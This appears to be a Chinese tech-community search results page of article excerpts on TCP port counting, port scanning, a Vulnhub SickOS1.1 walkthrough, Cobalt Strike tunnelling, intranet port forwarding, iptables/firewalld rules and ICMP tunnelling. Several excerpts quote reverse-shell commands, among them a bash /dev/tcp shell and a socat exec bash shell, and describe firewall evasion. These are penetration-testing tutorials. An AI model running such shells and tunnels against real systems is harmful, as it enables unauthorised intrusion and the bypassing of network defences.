首页
学习
活动
专区
圈层
工具
发布

使用Python统计端口TCP连接数

此脚本可以用来统计某个端口上连接的IP的数量,统计连接到这一端口的所有IP、最多的IP和次数以及TCP连接状态。     涉及到Python读取网络连接统计信息以及统计计算的一些基本操作。...此脚本可以用于Windows、Linux以及OSX,其中OSX上运行需要使用root权限(由于psutil的原因),使用时直接使用python运行此脚本文件即可。...如果提示‘ImportError’,则使用pip安装所缺的模块,非特权用户使用pip安装模块时需要使用sudo。     ...脚本内已经设定port为22,可以自己修改代码,使它允许成接收命令行位置参数或者手动输入。 运行效果图如下: 1.使用root用户运行 ? 2.使用非特权用户运行 ?...,python TCP连接数统计,Python统计连接数 --end--

3K10
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Python渗透测试之tcp几种端口扫描的讲解

    IP协议的基础,本节我们将进入TCP的讲解并给出自己写的一个python脚本。...SYN扫描: SYN扫描又称半开扫描,发送一个‘标志位’为S的TCP数据包到目标服务器的某个端口,如果端口开放,就会返回一个标志位为SYN,ACK的TCP数据包,如果端口关闭就返回标志位为RST的数据包...SYN扫描速度比较快,但容易被防火墙过滤,且丢包无法被发现 FIN扫描: 本机发送一个标志位为F的TCP数据包到目标服务器的某个端口,如果端口开放,就不会做出回应,如果端口关闭就返回标志位为RST的TCP...NULL扫描: 与FIN扫描类似,本机发送一个标志位为空的TCP数据包到目标服务器的某个端口,如果端口开放,就不会做出回应,如果端口关闭就返回标志位为RST的TCP数据包。...,如果端口关闭就返回标志位为RST的TCP数据包。

    1.5K100

    Python写TCP端口扫描工具之IP协议的讲解

    專 欄 ❈exploit,Python中文社区专栏作者,入坑Python一年。...arp欺骗的脚本工具,在渗透测试中我们首先要做的就是信息收集,可以说信息收集占渗透测试的一大部分,当我们知道有哪些存活的主机的情况下,我们下一步要做的就是查看存活的主机开放了哪些端口,从而根据相应的端口得到相应的服务...,从而进行爆破,漏洞利用等等,所以这次我打算讲一讲一些端口扫描工具的原理,内容主要为网络层IP协议和传输层TCP协议,本期内容为包括: •IP协议的作用; •IP报文的组成; •子网掩码; •IP...选路; •tcp协议的作用; •tcp报文的组成; •关于tcp的SYN,FIN,NULL,XAMS端口扫描的原理,并在最后展示一个自己写的简单的包含这几种扫描的工具。...C,与因特网通信IP与mac地址都会变,使用NAT技术,这理就不讲解了,主要是为了实现私有IP和公有IP的转换 综上可以看出数据包到达目标机是通过走一步看一步的方式到达的。

    2.1K60

    Vulnhub靶机实操笔记-SickOS1.1-解法二

    使用TCP和UDP的形式对扫出的端口进行协议的查看 3、TCP扫描 sudo nmap -sT -sV -O -p22,3128,8080 192.168.32.137 ?.../192.168.32.131/1234 0>&1;" -v #输出详情 --proxy #使用代理 ###注意sh需要写绝对路径 ?...四、内网提权 1、查已安装的软件&python转稳定shell 命令会列出系统中所有已安装的软件信息,显示当前环境安装了python工具,利用python转稳定交互shell dpkg -l #查已安装的软件...第二个命令,cron.d的目录下automate文件里有一个叫connect.py的定时任务,可以看到 每分钟以root权限用python去执行 /var/www/connect.py脚本 ?...cd到/var/www对connect.py文件进行修改,shell比较奇怪,输入o新建一行,如何将shellcode输入到python中 ? 成功获得root权限 ?

    64400

    在CentOS7上启用和使用firewalld

    例如,Plex服务器侦听端口32400并使用TCP,使用--add-port=标志为当前会话在公共区域中打开该端口: sudo firewall-cmd --zone=public --add-port...带有防火墙的转发端口 要将流量从一个端口转发到另一个端口或地址,请首先使用--add-masquerade开关启用对所需区域的伪装。...,我们将流量从端口80转发到同一服务器上的端口8080: sudo firewall-cmd --zone=external --add-forward-port=port=80:proto=tcp:toport...=8080 将流量转发到另一台服务器 在以下示例中,我们将流量从端口80转发到具有IP 10.10.10.2的服务器上的端口80: sudo firewall-cmd --zone=external...--add-forward-port=port=80:proto=tcp:toaddr=2 将流量转发到其他端口上的另一台服务器 在以下示例中,我们将流量从端口80转发到具有IP 10.10.10.2

    1.7K20

    内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

    =TCP localport=10086 通过IPv4吧本地127.0.0.1的内网3389端口转发到外网的10086端口 netsh interface portproxy add v4tov4 listenport...connectport - 一个TCP端口,来自listenport的连接会被转发到该端口。假设当前我们的RDP服务端口在一个非标准端口上进行响应,如10086(端口可以在服务设置中更改)。...二、使用python进行连接 命令格式: python abpttsclient.py ‐c webshell/config.txt ‐u "http://目标服务器/abptts.jsp" -f...本地内网IP:本地端口/目标边界内网IP:需要转发的目标边界端口 将目标边界的3389转发到本地的33389端口上: python abpttsclient.py -c webshell/config.txt...四、吧目标的3389端口转发到本地的33389 命令语法: [createTunnel]要绑定到本地哪个端口上[33389]:127.0.0.1:要绑定远程机器上的哪个端口[3389,22] [createTunnel

    6K30

    Cobalt Strike Spawn & Tunnel

    但是,该实现足够通用,可以利用任何可以生成与位置无关的 shellcode 的攻击性工具集,因此本文将演示如何将这些命令与 Meterpreter shellcode 一起使用。...,它将侦听到达端口 4444 的流量并将其转发到 184.105.181.155:4444。...,并且能够在不需要手动设置 iptables 和 ssh 端口转发的恶作剧的情况下将所有的流量隧道传输回来使用,真的很酷。...在我对主机进行某种 RCE(例如,MS SQL 盒上的 xp_cmdshell)并且我想执行不适合 RCE 方法的大型负载的情况下,我经常使用反向端口转发。...标准的 rportfwd 命令要求 Team Server 将流量转发到一个可公开访问的 IP(就像我们的第一个 spunnel 示例一样),或者在其他转发魔法的帮助下转发到其他地方。

    1.9K30

    浅谈内网端口转发

    在被控制端执行命令:lcx.exe -slave 192.168.205.1 53 192.168.205.143 3389 //将内网3389端口转发到公网53端口; 在控制端执行命令:lcx.exe...Tunna端口转发 Tunna这个工具使用起来也特方便,脚本的编写也是基于Python2版本。...首先我们在我们先在目标主机上面执行命令:bash -i >& >/dev/tcp/公网IP/端口 0>&1; 我们先不看执行的效果如何,分析一下这个命令的含义: bash -i //意思指的是产生一个bash...的交互环境; /dev/tcp/公网IP/端口 //大佬们其实一看就明白,就是让内网主机与公网主机的某个端口进行连接; 0>&1 //将标准输入域标准输出内容相结合,然后重定向给前面的标准输出内容; 然后在公网服务器上面执行监听命令...首先我们在公网上面执行监听9999端口的命令:socat TCP-LISTEN:9999 - 目标主机上面执行以下命令:socat exec:’bash -li’,pty,stderr,setsid,sigint

    2.9K11

    使用Nginx进行TCPUDP端口转发

    之前分享过《Linux安装rinetd实现TCP端口转发》,rinetd配置简单,使用方便,但遗憾的是不支持UDP转发。...如果需要同时支持TCP/UDP端口转发可以使用Nginx 安装Nginx 可以自行去官方http://nginx.org/下载最新版本Nginx编译安装,注意版本一定要大于1.9.1,编译的时候需要-...编译方法这里就不介绍了,这篇文章直接使用xiaoz写好的一键脚本安装Nginx,省时、省力,直接执行下面的命令即可。...#安装完成后执行下面的命令让环境变量生效 source /etc/profile #执行下面的命令查看nginx信息 nginx -V 端口转发 在nginx.conf添加如下配置,并使用nginx...可以将IPV4的数据包转发到IPV6,IPV6的IP需要使用[]括起来。

    30K20

    如何在 Linux 中使用 iptables 设置端口转发?

    端口转发的原理端口转发是一种网络转发技术,它允许将来自一个端口的数据包转发到另一个端口。在Linux中,使用iptables可以实现端口转发,通过修改数据包的目标地址和端口来实现数据包的转发。...使用iptables进行端口转发的步骤启用IPv4转发在进行端口转发之前,首先需要确保系统上启用了IPv4数据包转发功能。...可以通过修改/etc/sysctl.conf文件来启用IPv4转发,将以下行取消注释(如果存在),或者手动添加:net.ipv4.ip_forward=1然后执行以下命令使配置生效:sudo sysctl...例如,如果要将外部网络的TCP流量转发到内部服务器的特定端口,可以使用以下命令:sudo iptables -t nat -A PREROUTING -p tcp --dport [外部端口] -j DNAT...--to-destination [内部服务器IP]:[内部端口]这条规则将外部端口的TCP流量转发到内部服务器的指定端口。

    2.6K20

    ATT&CK视角下的红蓝对抗:十五.内网穿透之利用ICMP协议进行隧道穿透

    一.前言 本文介绍了利用ICMP协议进行隧道穿透的方法。ICMP协议不需要开放端口,可以将TCP/UDP数据封装到ICMP的Ping数据包中,绕过防火墙限制。...这种手段的优点是不需要开放端口就可将TCP/UDP数据封装到ICMP的Ping数据包中,从而绕过防火墙的限制,攻击者可以利用较短的命令得到大量的ICMP响应,常见的ICMP隧道穿透通常可以利用Icmpsh...这里注意的是,攻击机需要使用Python 2的环境来安装python-impacket模块,我们可以使用pip install impacket==0.9.12命令或者官网下载模块安装。...2.PingTunnel 搭建隧道 PingTunnel工具是基于ICMP协议的开源的隧道工具,其优点是使用简单,它的原理是通过将TCP/UDP/Sock5流量夹带在ICMP数据中进行转发,下面将会演示如何使用该工具进行隧道穿透...,默认 1000ms -l 本地的地址,发到这个端口的流量将转发到服务器 -s 服务器的地址,流量将通过隧道转发到这个服务器 -t 远端服务器转发的目的地址,流量将转发到这个地址 -timeout 记录连接超时的时间

    92260
    领券